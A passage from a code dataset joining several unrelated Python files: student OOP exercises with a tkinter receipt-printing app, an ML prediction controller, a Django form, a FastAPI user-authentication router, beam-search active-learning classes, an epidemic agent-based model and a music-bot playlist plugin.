Circle(10)\nrmp = Shape()\n\n\ndef copy(Shape):\n Shape.display()\n\n\ncopy(C1)\ncopy(R1)\n\n# C1.Area()\n# multiple inheritance\n\n\nclass Animal:\n def _init_(self, name):\n self.name = name\n\n def eat(self):\n print(f\"{self.name} is eating.\")\n\n def sleep(self):\n print(f\"{self.name} is sleeping.\")\n\n\nclass Dom(Animal):\n def _init_(self, name):\n super()._init_(name)\n\n def eat_plants(self):\n print(f\"{self.name} lives at home.\")\n\n\nclass wild(Animal):\n def _init_(self, name):\n super()._init_(name)\n\n def eat_meat(self):\n print(f\"{self.name} lives in the bush.\")\n\n\n# eagle = wild(\"Eagle\")\n# eagle.eat()\n\n# \"Method overridding\"\n\"\"\"\n Method overriding occurs when a subclass provides its own \n implementation of a method that is already defined in its superclass.\n This allows objects of different classes to have different behaviors \n while being treated uniformly based on their common superclass.\n\"\"\"\n\n\n\"\"\"\nclass Worker:\n def __init__(self, name):\n self.name = name\n\n def postion(self):\n print()\n\"\"\"\n\n# Abstraction\n\n\nclass Library(ABC):\n @abstractmethod\n def detail(self):\n pass\n\n\nclass Book(Library):\n def __init__(self, bname, bauthor):\n self.bname = bname\n self.bauthor = bauthor\n\n def detail(self):\n print(f\"Book Title: {self.bname} and author: {self.bauthor}\")\n\n\nb1 = Book(\"Weep Not Child\", \"Mary Vanessa\")\nb1.detail()\n\n\n# --------------------------------Assignment------------------------------------------------\n\"\"\"\n Create a receipt printing program with GUI interface.\n A more advanced detail wins more points.\n\"\"\"\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"Mary Vanessa Nansumba Receipt Printing\")\nroot.geometry(\"600x600\")\n\n# Function to add an item to the list\n\n\ndef add_item():\n item = item_entry.get()\n quantity = quantity_entry.get()\n price = price_entry.get()\n\n if item and quantity and price:\n items_listbox.insert(\n tk.END, f\"{item} - Quantity: {quantity} - Price: ${price}\")\n item_entry.delete(0, tk.END)\n quantity_entry.delete(0, tk.END)\n price_entry.delete(0, tk.END)\n else:\n messagebox.showwarning(\"Missing Information\",\n \"Please enter item details.\")\n\n# Function to remove an item from the list\n\n\ndef remove_item():\n selected_index = items_listbox.curselection()\n if selected_index:\n items_listbox.delete(selected_index)\n\n\n# Function to generate the receipt preview\ndef generate_preview():\n receipt_text = \"\"\n receipt_text += \"Date: \" + get_current_date() + \"\\n\\n\"\n receipt_text += \"Seller:\\n\" + seller_name_entry.get() + \"\\n\" + \\\n seller_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Buyer:\\n\" + buyer_name_entry.get() + \"\\n\" + \\\n buyer_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Items:\\n\"\n\n for i in range(items_listbox.size()):\n receipt_text += items_listbox.get(i) + \"\\n\"\n\n receipt_text += \"\\nSubtotal: $\" + str(get_subtotal()) + \"\\n\"\n receipt_text += \"Tax: $\" + str(get_tax(get_subtotal())) + \"\\n\"\n receipt_text += \"Total: $\" + \\\n str(get_subtotal() + get_tax(get_subtotal()))\n\n preview_dialog = tk.Toplevel(root)\n preview_dialog.title(\"Receipt Preview\")\n\n receipt_preview = tk.Label(\n preview_dialog, text=receipt_text, font=(\"Arial\", 12))\n receipt_preview.pack(padx=20, pady=20)\n\n\n# Function to generate the PDF\ndef generate_pdf():\n file_path = filedialog.asksaveasfilename(\n initialdir=\".\",\n title=\"Save Receipt as PDF\",\n filetypes=[(\"PDF Files\", \"*.pdf\")]\n )\n\n if file_path:\n if not file_path.endswith(\".pdf\"):\n file_path += \".pdf\"\n\n c = FPDF()\n c.add_page()\n c.set_font(\"Arial\", \"B\", 12)\n c.cell(0, 10, \"Receipt\", ln=True, align=\"C\")\n c.ln(10)\n\n receipt_text = \"\"\n receipt_text += \"Date: \" + get_current_date() + \"\\n\\n\"\n receipt_text += \"Seller:\\n\" + seller_name_entry.get() + \"\\n\" + \\\n seller_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Buyer:\\n\" + buyer_name_entry.get() + \"\\n\" + \\\n buyer_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Items:\\n\"\n\n for i in range(items_listbox.size()):\n receipt_text += items_listbox.get(i) + \"\\n\"\n\n receipt_text += \"\\nSubtotal: $\" + str(get_subtotal()) + \"\\n\"\n receipt_text += \"Tax: $\" + str(get_tax(get_subtotal())) + \"\\n\"\n receipt_text += \"Total: $\" + \\\n str(get_subtotal() + get_tax(get_subtotal()))\n\n c.set_font(\"Arial\", \"\", 10)\n c.multi_cell(0, 10, receipt_text)\n\n try:\n c.output(file_path)\n messagebox.showinfo(\n \"PDF Generated\", \"Receipt saved as PDF successfully!\")\n except Exception as e:\n messagebox.showerror(\n \"Error\", f\"An error occurred while saving the PDF: {str(e)}\")\n\n# Helper function to get the current date\n\n\ndef get_current_date():\n import datetime\n return datetime.date.today().strftime(\"%Y-%m-%d\")\n\n# Helper function to calculate the subtotal\n\n\ndef get_subtotal():\n subtotal = 0.0\n for i in range(items_listbox.size()):\n item_info = items_listbox.get(i)\n price_start_index = item_info.rfind(\"$\") + 1\n price = float(item_info[price_start_index:])\n subtotal += price\n return subtotal\n\n# Helper function to calculate the tax\n\n\ndef get_tax(amount):\n tax_rate = 0.07\n return amount * tax_rate\n\n\n# Create the seller section\nseller_frame = tk.Frame(root)\nseller_frame.pack(pady=10)\n\nseller_name_label = tk.Label(seller_frame, text=\"Seller Name:\")\nseller_name_label.pack(side=tk.LEFT)\n\nseller_name_entry = tk.Entry(seller_frame)\nseller_name_entry.pack(side=tk.LEFT, padx=10)\n\nseller_address_label = tk.Label(seller_frame, text=\"Seller Address:\")\nseller_address_label.pack(side=tk.LEFT)\n\nseller_address_entry = tk.Text(seller_frame, height=3, width=40)\nseller_address_entry.pack(side=tk.LEFT, padx=10)\n\n# Create the buyer section\nbuyer_frame = tk.Frame(root)\nbuyer_frame.pack(pady=10)\n\nbuyer_name_label = tk.Label(buyer_frame, text=\"Buyer Name:\")\nbuyer_name_label.pack(side=tk.LEFT)\n\nbuyer_name_entry = tk.Entry(buyer_frame)\nbuyer_name_entry.pack(side=tk.LEFT, padx=10)\n\nbuyer_address_label = tk.Label(buyer_frame, text=\"Buyer Address:\")\nbuyer_address_label.pack(side=tk.LEFT)\n\nbuyer_address_entry = tk.Text(buyer_frame, height=3, width=40)\nbuyer_address_entry.pack(side=tk.LEFT, padx=10)\n\n\n# Create the items section\nitems_frame = tk.Frame(root)\nitems_frame.pack(pady=10)\n\nitems_label = tk.Label(items_frame, text=\"Items\")\nitems_label.pack()\n\nitem_frame = tk.Frame(items_frame)\nitem_frame.pack()\n\nitem_label = tk.Label(item_frame, text=\"Item:\")\nitem_label.pack(side=tk.LEFT)\n\nitem_entry = tk.Entry(item_frame)\nitem_entry.pack(side=tk.LEFT, padx=10)\n\nquantity_label = tk.Label(item_frame, text=\"Quantity:\")\nquantity_label.pack(side=tk.LEFT)\n\nquantity_entry = tk.Entry(item_frame, width=10)\nquantity_entry.pack(side=tk.LEFT, padx=10)\n\nprice_label = tk.Label(item_frame, text=\"Price:\")\nprice_label.pack(side=tk.LEFT)\n\nprice_entry = tk.Entry(item_frame, width=10)\nprice_entry.pack(side=tk.LEFT, padx=10)\n\nadd_button = tk.Button(items_frame, text=\"Add Item\", command=add_item)\nadd_button.pack(pady=10)\n\nitems_listbox = tk.Listbox(items_frame, height=10, width=60)\nitems_listbox.pack(pady=10)\n\nremove_button = tk.Button(items_frame, text=\"Remove Item\", command=remove_item)\nremove_button.pack(pady=10)\n\n# Create the receipt preview frame\nreceipt_preview_frame = tk.Frame(root)\nreceipt_preview_frame.pack(pady=10)\n\nreceipt_preview_button = tk.Button(\n receipt_preview_frame, text=\"Preview Receipt\", command=generate_preview)\nreceipt_preview_button.pack(side=tk.LEFT, padx=10)\n\ngenerate_pdf_button = tk.Button(\n receipt_preview_frame, text=\"Generate PDF\", command=generate_pdf)\ngenerate_pdf_button.pack(side=tk.LEFT, padx=10)\n\n# Run the application\nroot.mainloop()\n","repo_name":"mary-nessa/Recess","sub_path":"Mary_vanessa/mary_vanessa_nansumba_morning.py","file_name":"mary_vanessa_nansumba_morning.py","file_ext":"py","file_size_in_byte":9399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42517277394","text":"import json\nimport logging\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom mlp.mlp import MLP\nfrom naive_classifier.naive_classifier import NaiveClassifier\n\n\ndef parse_data(json_input):\n if isinstance(json_input, str):\n parsed = json.loads(json_input)\n else:\n parsed = json.loads(json.dumps(json_input))\n data = pd.DataFrame(parsed)\n\n col_session_id = \"session_id\"\n col_success = \"successful\"\n\n session_id = data[col_session_id]\n success = data[col_success]\n\n return data.drop([col_session_id, col_success], axis=1), session_id, success\n\n\ndef create_df(session_id, prediction, success):\n df = pd.DataFrame()\n df[\"session_id\"] = session_id\n df[\"prediction\"] = prediction\n df[\"correct_value\"] = success\n return df\n\n\nclass Controller:\n def __init__(self):\n logging.basicConfig(filename=\"model_compare.log\", level=logging.DEBUG)\n\n data = pd.read_csv(\"../data/data_with_categories.csv\")\n col_to_predict = \"successful\"\n\n y = data[col_to_predict]\n X = data.drop([col_to_predict], axis=1)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=21)\n\n self.__dummy_model = NaiveClassifier(X_train, y_train)\n self.__mlp = MLP(X_train, y_train)\n\n def predict_mlp(self, json_input):\n data_input, session_id, success = parse_data(json_input)\n\n prediction = self.__mlp.mlp_predict(data_input)\n\n df = create_df(session_id, prediction, success)\n\n json_log = df.to_json(orient=\"records\")\n\n logging.info(f\"Model: MLP; {json_log}\")\n\n return {\"model\": \"MLP\", \"predictions\": df.to_dict(orient=\"records\")}\n\n def predict_naive(self, json_input):\n data_input, session_id, success = parse_data(json_input)\n\n prediction = self.__dummy_model.dummy_classifier_predict(data_input)\n\n df = create_df(session_id, prediction, success)\n\n json_log = df.to_json(orient=\"records\")\n\n logging.info(f\"Model: Naive; {json_log}\")\n\n return {\"model\": \"Naive\", \"predictions\": df.to_dict(orient=\"records\")}\n","repo_name":"ilyashich/IUM","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73594496108","text":"from django import forms\nfrom .models import Group, Vehicle, Device, Person\nfrom django.contrib.auth.models import User\n\nclass GroupForm(forms.ModelForm):\n # Define choices for the vehicleId field\n vehicle_choices = [(vehicle.id, vehicle.__int__()) for vehicle in Vehicle.objects.all()]\n\n vehicleId = forms.ChoiceField(\n choices=vehicle_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n\n # Define choices for the deviceId field\n device_choices = [(device.id, device.__int__()) for device in Device.objects.all()]\n\n deviceId = forms.ChoiceField(\n choices=device_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n\n # Define choices for the personId field\n person_choices = [(person.id, person.__str__()) for person in Person.objects.all()]\n\n personId = forms.ChoiceField(\n choices=person_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n\n user_choices = [(user.id, user.username) for user in User.objects.all()]\n\n userId = forms.ChoiceField(\n choices=user_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n \n class Meta:\n model = Group\n fields = ['name', 'vehicleId', 'deviceId', 'personId', 'userId']","repo_name":"HaranK007/Vehicle_Tracking","sub_path":"adminDashboard/froms.py","file_name":"froms.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2020914495","text":"from typing import Any, Optional, Union\n\nimport cloudinary.uploader\nfrom cloudinary.exceptions import Error\nfrom fastapi import APIRouter, Depends, HTTPException, Query, Security, status, File\nfrom fastapi.encoders import jsonable_encoder\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\nfrom sqlalchemy.orm import Session\n\nfrom todo.api_v1.config import Config\nfrom todo.api_v1.schemas.user_schema import (\n AccessTokenData, UserCreate, User, Credentials, TokenData, UserProfile)\nfrom todo.api_v1.schemas.error_response_schema import ErrorResponse, error_responses\nfrom todo.api_v1.dependencies.database import get_db\nfrom todo.api_v1.database.actions.user_actions import (\n create_user, get_user_by_id, get_user_by_username, set_profile_image, authentication_handler)\n\nrouter = APIRouter(prefix=Config.API_VERSION_STRING, tags=['User'])\nsecurity = HTTPBearer(scheme_name='Bearer')\ncloudinary.config(cloud_name=Config.CLOUDINARY_CLOUD_NAME,\n api_key=Config.CLOUDINARY_CLOUD_API_KEY,\n api_secret=Config.CLOUDINARY_CLOUD_API_SECRET)\n\n\n@router.post('/users', tags=['User'], responses=error_responses)\ndef create_user_route(user: UserCreate,\n db: Session = Depends(get_db)):\n \"\"\"\n API route to create a new user instance\n \"\"\"\n try:\n create_user(db=db, user=user)\n return {'message': 'User created successfully'}\n except Exception as e:\n if isinstance(e, HTTPException):\n raise e\n raise HTTPException(status_code=status.HTTP_500_INTERNAL_SERVER_ERROR, detail=jsonable_encoder(ErrorResponse(\n message='Internal server error', code=status.HTTP_500_INTERNAL_SERVER_ERROR)))\n\n\n@router.post(\"/users/login\", tags=[\"User\"], response_model=Union[TokenData, dict], responses=error_responses)\ndef login_user(credentials: Credentials, db: Session = Depends(get_db)):\n \"\"\"\n API route to login a user\n \"\"\"\n try:\n user = get_user_by_username(db=db, username=credentials.username)\n if not user:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail=jsonable_encoder(ErrorResponse(\n message=\"Username not found\", code=status.HTTP_401_UNAUTHORIZED)))\n\n if not authentication_handler.decode_password(credentials.password, user.hashed_password):\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail=jsonable_encoder(ErrorResponse(\n message=\"Invalid password\", code=status.HTTP_401_UNAUTHORIZED)))\n access_token = authentication_handler.encode_jwt_token(\n username=user.username)\n refresh_token = authentication_handler.encode_jwt_refresh_token(\n username=user.username)\n return {\"access_token\": access_token, \"refresh_token\": refresh_token}\n except Exception as e:\n raise e\n\n\n@router.get('/users/me', response_model=Union[UserProfile, dict], tags=['User'], responses=error_responses)\ndef get_user_profile(credentials: HTTPAuthorizationCredentials = Security(security),\n db: Session = Depends(get_db)):\n \"\"\"\n API route to get a user profile\n \"\"\"\n access_token = credentials.credentials\n username = authentication_handler.decode_jwt_token(access_token)\n try:\n user = get_user_by_username(db=db, username=username)\n return {\"username\": user.username, \"profile_image\": user.profile_image}\n except Exception as e:\n raise e\n\n\n@router.post('/users/me/upload', tags=['User'], responses=error_responses)\ndef upload_profile_image(profile_image: bytes = File(...), credentials: HTTPAuthorizationCredentials = Security(security), db: Session = Depends(get_db)):\n \"\"\"\n API route to upload a profile image\n \"\"\"\n access_token = credentials.credentials\n username = authentication_handler.decode_jwt_token(access_token)\n try:\n user = get_user_by_username(db=db, username=username)\n if user:\n if profile_image is None:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=jsonable_encoder(\n ErrorResponse(code=status.HTTP_400_BAD_REQUEST, message=\"No file uploaded\")))\n profile_image = cloudinary.uploader.upload(profile_image, allowed_formats=[\n 'png', 'jpg', 'jpeg'], public_id=user.username)\n profile_image_url = profile_image[\"secure_url\"]\n print(profile_image_url)\n set_profile_image(db=db, user=user,\n image_url=profile_image_url)\n return {\"message\": \"Profile image uploaded successfully\",\n \"url\": profile_image_url}\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=jsonable_encoder(\n ErrorResponse(code=status.HTTP_404_NOT_FOUND, message=\"User not found\")))\n except Exception as e:\n if isinstance(e, Error):\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=jsonable_encoder(\n ErrorResponse(code=status.HTTP_400_BAD_REQUEST, message=e.args[0])))\n raise e\n\n\n@ router.get(\"/users/refresh\", tags=[\"User\"], response_model=Union[AccessTokenData, Any], responses=error_responses)\ndef refresh_token(credentials: HTTPAuthorizationCredentials = Security(security)):\n try:\n refresh_token = credentials.credentials\n new_jwt_token = authentication_handler.refresh_jwt_token(refresh_token)\n return {\"access_token\": new_jwt_token}\n except Exception as e:\n raise e\n\n\n@ router.get('/users', response_model=User, tags=['User'])\ndef get_user_route(user_id: Optional[int] = Query(None, alias=\"id\"),\n username: Optional[str] = Query(\n None, alias=\"username\", max_length=10),\n db: Session = Depends(get_db)):\n \"\"\"\n API route to get a user instance by id or by username\n \"\"\"\n try:\n if user_id:\n return get_user_by_id(db=db, user_id=user_id)\n if username:\n return get_user_by_username(db=db, username=username)\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=jsonable_encoder(ErrorResponse(\n message=\"User not found\", code=status.HTTP_404_NOT_FOUND)))\n","repo_name":"KrazyKahunaGuy/todo-app-backend","sub_path":"todo/api_v1/routers/user_router.py","file_name":"user_router.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22556014128","text":"import random\n\nTQDM_MODE = True\n\n\nclass BeamSearchSolution:\n def __init__(\n self,\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n ):\n self.windows = windows\n if not init_score:\n self.score = sum([w.score for w in windows])\n else:\n self.score = init_score\n if not init_cost:\n self.cost = sum([w.cost for w in windows])\n else:\n self.cost = init_cost\n self.overlap_index = init_overlap_index\n self.max_cost = max_cost\n self.lock = False\n self.B = B\n self.diversity_policy = diversity_policy\n\n def add_window(self, new_window, train_set):\n if self.cost >= self.max_cost:\n self.lock = True\n return self\n init_cost = self.cost + new_window.cost\n init_score = self.score + new_window.score\n init_overlap_index = self.overlap_index.copy()\n if new_window.i in init_overlap_index:\n init_overlap_index[new_window.i] = init_overlap_index[new_window.i].union(\n new_window.get_index_set()\n ) # Need to generalise this\n else:\n init_overlap_index[new_window.i] = new_window.get_index_set()\n # new_ngram = train_set.data_from_window(new_window)\n\n return self.__class__(\n self.windows + [new_window],\n self.max_cost,\n self.B,\n init_cost=init_cost,\n init_score=init_score,\n init_overlap_index=init_overlap_index,\n diversity_policy=self.diversity_policy,\n )\n\n def is_permutationally_distinct(self, other):\n # We do a proxy-check for permutation invariance by checking for score and cost of solutions\n if abs(self.score - other.score) < 1e-6 and self.cost == other.cost:\n return False\n else:\n return True\n\n def all_permutationally_distinct(self, others):\n for other_solution in others:\n if not self.is_permutationally_distinct(other_solution):\n return False\n else:\n return True\n\n def new_window_unlabelled(self, new_window):\n if new_window.i not in self.overlap_index:\n self.overlap_index[new_window.i] = set() # Just in case!\n return True\n else:\n new_word_idx = new_window.get_index_set()\n if self.overlap_index[new_window.i].intersection(new_word_idx):\n return False\n else:\n return True\n\n def new_window_viable(self, new_window):\n if not self.new_window_unlabelled(new_window):\n return False\n if self.diversity_policy.new_window_viable(new_window, self):\n return True\n else:\n return False\n\n def branch_out(self, other_solutions, window_scores, usable_mask, train_set):\n raise NotImplementedError\n\n\nclass GreedyBeamSearchSolution(BeamSearchSolution):\n\n def __init__(\n self,\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n *args\n ):\n super(GreedyBeamSearchSolution, self).__init__(\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n )\n\n def ep_check(self):\n return False\n\n def choose_window_uniformly(self, window_scores, usable_mask, train_set):\n raise NotImplementedError\n\n def branch_out(self, other_solutions, window_scores, usable_mask, train_set):\n # ASSUME window_scores ALREADY SORTED\n local_branch = []\n for j, window in enumerate(window_scores):\n if not usable_mask[j]:\n continue\n if self.ep_check():\n possible_node, usable_mask = self.choose_window_uniformly(window_scores, usable_mask, train_set)\n local_branch.append(possible_node)\n if len(local_branch) == self.B:\n return local_branch, usable_mask\n if self.new_window_viable(window):\n possible_node = self.add_window(window, train_set)\n # Permutation check unused if we are using usable_mask - this might want to be parameterised in the\n # future. You can use j here to change things up\n # if possible_node.all_permutationally_distinct(other_solutions):\n local_branch.append(possible_node)\n usable_mask[j] = 0\n if len(local_branch) == self.B:\n return local_branch, usable_mask\n if self.lock:\n return [self], usable_mask\n\n # No more windows addable\n if len(local_branch) == 0:\n self.lock = True\n return [self], usable_mask\n else:\n return local_branch, usable_mask\n\n\nclass EpsilonGreedyBeamSearchSolution(GreedyBeamSearchSolution):\n\n def __init__(\n self,\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n epsilon\n ):\n super(EpsilonGreedyBeamSearchSolution, self).__init__(\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n )\n self.epsilon = epsilon\n\n def ep_check(self):\n return random.uniform(0, 1) str:\n return self.ID\n\n def result_id(self, p: Parameters) -> str:\n return p.sha1_hash()\n\n def run(self, p: Parameters) -> ModelResult:\n\n # run multiple steps of the simulation\n for i in range(p.number_of_steps):\n self.step(p, i)\n\n # placeholders for the report\n standard_sol = [{'t': range(p.number_of_steps)}]\n perc = [0] * p.number_of_steps\n percentiles = [perc, perc, perc, perc, perc]\n config_dict = []\n [config_dict.append(\n dict(\n beta=0,\n latentRate=0,\n removalRate=0,\n hospRate=0,\n deathRateICU=0,\n deathRateNoIcu=0\n )) for _ in range(p.number_of_steps)]\n\n report_raw = [[0]]\n prevalence_age = pd.DataFrame([[0]])\n prevalence_all = pd.DataFrame([[0]])\n cumulative_all = pd.DataFrame([[0]])\n cumulative_age = pd.DataFrame([[0]])\n\n states = ['exposed_tl', 'presymptomatic_tl', 'symptomatic_tl', 'mild_tl', 'severe_tl', 'recovered_tl',\n 'qua_susceptible_tl', 'qua_exposed_tl', 'qua_presymptomatic_tl', 'qua_symptomatic_tl', 'qua_mild_tl',\n 'qua_severe_tl', 'qua_recovered_tl']\n # disease_state_tracker_plot = go.Figure()\n\n mr = ModelResult(self.result_id(p), {\n 'standard_sol': standard_sol,\n 'percentiles': percentiles,\n 'config_dict': config_dict,\n 'params': p,\n 'report': report_raw,\n 'track_states_df': p.track_states,\n 'multiple_categories_to_plot': states,\n 'prevalence_all': prevalence_all,\n 'cumulative_all': cumulative_all,\n 'cumulative_age': cumulative_age\n })\n\n # at end of simulation, return model result\n return mr\n\n @staticmethod\n def step(p: Parameters, t):\n \"\"\"\n Execute abm simulation step\n\n Parameters\n ----------\n p: `Parameters` object for simulation\n t: Step number\n\n Returns\n -------\n None\n\n \"\"\"\n p.track_states[t, :] = np.bincount(p.population[:, 1].astype(int), minlength=14)\n\n # finish simulation by checking states\n # TODO: currently, if all people are either susceptible/recovered then we finish simulation\n # TODO: should it not include qua_susceptible/qua_recovered states as well?\n if abm.epidemic_finish(np.concatenate((p.track_states[t, 1:6], p.track_states[t, 7:p.number_of_states])), t):\n return\n\n # The probability that a person's disease state will change from mild->recovered (0.37)\n # Liu et al 2020 The Lancet.\n p.mild_rec = np.random.uniform(0, 1, p.total_population) > math.exp(0.2 * math.log(0.1))\n\n # The probability that a person's disease state will change from severe->recovered (0.071)\n # Cai et al.\n p.sev_rec = np.random.uniform(0, 1, p.total_population) > math.exp(math.log(63 / 153) / 12)\n\n # Get random numbers to determine health states\n p.pick_sick = np.random.uniform(0, 1, p.total_population)\n\n if p.ACTIVATE_INTERVENTION and t != 0:\n p.iat1 = t\n p.ACTIVATE_INTERVENTION = False\n p.smaller_movement_radius = 0.001\n p.transmission_reduction = 0.25 # TODO: why is this here?\n p.foodpoints_location, p.foodpoints_numbers, p.foodpoints_sharing = abm.position_foodline(\n p.households_location, p.foodline_blocks[0], p.foodline_blocks[1])\n p.local_interaction_space = abm.interaction_neighbours_fast(p.households_location,\n p.smaller_movement_radius,\n p.larger_movement_radius,\n p.overlapping_rages_radius,\n p.ethnical_corellations)\n p.viol_rate = 0.05\n p.population[:, 8] = np.where(np.random.rand(p.total_population) < p.viol_rate, 1, 0)\n\n # increase day count for all non-susceptible people\n # TODO: should we exclude qua_susceptible (index=7) as well here along with susceptible (index=0) ?\n p.population[np.where(p.population[:, 1] > 0), 3] += 1\n\n # update disease states of people not in quarantine\n # also update the population matrix and total hospitalized count\n p.population, p.total_number_of_hospitalized = abm.disease_state_update(\n p.population,\n p.mild_rec,\n p.sev_rec,\n p.pick_sick,\n p.total_number_of_hospitalized\n )\n\n # update disease states of people in quarantine\n # also update the population matrix and total hospitalized count\n p.population, p.total_number_of_hospitalized = abm.disease_state_update(\n p.population,\n p.mild_rec,\n p.sev_rec,\n p.pick_sick,\n p.total_number_of_hospitalized,\n quarantined=True\n )\n\n p.population = abm.assign_new_infections(p.population,\n p.toilets_sharing,\n p.foodpoints_sharing,\n p.num_toilet_visit,\n p.num_toilet_contact,\n p.num_food_visit,\n p.num_food_contact,\n p.pct_food_visit,\n p.transmission_reduction,\n p.local_interaction_space,\n p.probability_infecting_person_in_household_per_day,\n p.probability_infecting_person_in_foodline_per_day,\n p.probability_infecting_person_in_toilet_per_day,\n p.probability_infecting_person_in_moving_per_day)\n\n p.population = abm.move_hhl_quarantine(p.population, p.probability_spotting_symptoms_per_day)\n\n p.quarantine_back = np.logical_and(p.population[:, 1] == 13, p.population[:, 3] >= p.clearday)\n p.population[p.quarantine_back, 1] = 6\n","repo_name":"Ben-McIlveen/model-server","sub_path":"ai4good/models/abm/abm_model.py","file_name":"abm_model.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"43368102812","text":"from typing import Any, List, Optional, cast\n\nfrom ..config import config\nfrom ..data_source import (\n get_offset_by_page_num,\n get_playlist_info,\n get_track_info,\n search_playlist,\n)\nfrom ..draw import Table, TableHead, TablePage\nfrom ..types import Playlist as PlaylistModel\nfrom ..types import PlaylistFromSearch, PlaylistSearchResult, SongSearchResult\nfrom ..types import Song as SongModel\nfrom .base import BasePlaylist, BaseSearcher, playlist, searcher\nfrom .song import Song, SongSearcher\n\nCALLING = \"歌单\"\nCHILD_CALLING = Song.calling\nCOMMANDS = [\"歌单\", \"playlist\"]\nLINK_TYPES = [\"playlist\"]\n\n\n@playlist\nclass Playlist(BasePlaylist[PlaylistModel, SongModel, Song]):\n calling = CALLING\n child_calling = CHILD_CALLING\n link_types = LINK_TYPES\n\n info: PlaylistModel\n\n @property\n def playlist_id(self) -> int:\n return self.info.id\n\n def __init__(self, info: PlaylistModel, *args, **kwargs) -> None:\n self.info = info\n super().__init__(*args, **kwargs)\n\n def __repr__(self) -> str:\n return f\"{self.__class__.__name__}(playlist_id={self.playlist_id})\"\n\n @classmethod\n async def from_id(cls, arg_id: int) -> \"Playlist\":\n resp = await get_playlist_info(arg_id)\n return cls(resp)\n\n async def _build_list_resp(self, resp: PlaylistModel, page: int) -> TablePage:\n if not resp.tracks:\n raise ValueError(\"Playlist is empty\")\n fake_song_search_resp = SongSearchResult(\n searchQcReminder=None,\n songCount=resp.trackCount,\n songs=resp.tracks,\n )\n return await SongSearcher._build_list_resp( # noqa: SLF001\n cast(Any, self),\n fake_song_search_resp,\n page,\n )\n\n async def _extract_resp_content(\n self,\n resp: PlaylistModel,\n ) -> List[SongModel]:\n return resp.tracks\n\n async def _do_get_page(self, page: int) -> PlaylistModel:\n offset = get_offset_by_page_num(page)\n track_ids = [\n x.id for x in self.info.trackIds[offset : offset + config.ncm_list_limit]\n ]\n tracks = await get_track_info(track_ids)\n kwargs = {**self.info.dict(by_alias=True), \"tracks\": tracks}\n return PlaylistModel(**kwargs)\n\n async def _build_selection(self, resp: SongModel) -> Song:\n return Song(info=resp)\n\n\n@searcher\nclass PlaylistSearcher(\n BaseSearcher[PlaylistSearchResult, PlaylistFromSearch, Playlist],\n):\n calling = CALLING\n commands = COMMANDS\n\n @classmethod\n async def from_id(cls, arg_id: int) -> Optional[Playlist]:\n try:\n return await Playlist.from_id(arg_id)\n except ValueError:\n return None\n\n async def _build_list_resp(\n self,\n resp: PlaylistSearchResult,\n page: int,\n ) -> TablePage:\n if not resp.playlists:\n raise ValueError(\"No song in raw response\")\n table = Table(\n [\n TableHead(\"序号\", align=\"right\"),\n TableHead(\"歌单名\", max_width=config.ncm_max_name_len),\n TableHead(\"创建者\", max_width=config.ncm_max_artist_len),\n TableHead(\"歌曲数\", align=\"center\"),\n TableHead(\"播放数\", align=\"center\"),\n TableHead(\"收藏数\", align=\"center\"),\n ],\n [\n [\n f\"[b]{i}[/b]\",\n x.name,\n x.creator.nickname,\n f\"{x.trackCount}\",\n f\"{x.playCount}\",\n f\"{x.bookCount}\",\n ]\n for i, x in enumerate(resp.playlists, self._calc_index_offset(page))\n ],\n )\n return TablePage(table, self.child_calling, page, resp.playlistCount)\n\n async def _extract_resp_content(\n self,\n resp: PlaylistSearchResult,\n ) -> Optional[List[PlaylistFromSearch]]:\n return resp.playlists\n\n async def _do_get_page(self, page: int) -> PlaylistSearchResult:\n return await search_playlist(self.keyword, page=page)\n\n async def _build_selection(self, resp: PlaylistFromSearch) -> Playlist:\n return await Playlist.from_id(resp.id)\n","repo_name":"lgc-NB2Dev/nonebot-plugin-multincm","sub_path":"nonebot_plugin_multincm/providers/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"20345931555","text":"#! /usr/bin/env python\n\n\"\"\"run and initiate nltk.download('all') \"\"\"\n\nimport nltk\n\n# setup or argparse\n\nPERMISSION = input(\"Would you like to continue and install all nltk dependanies? [Y/n] \")\n\nif PERMISSION == 'Y':\n try:\n nltk.download('all')\n COMPLETE = 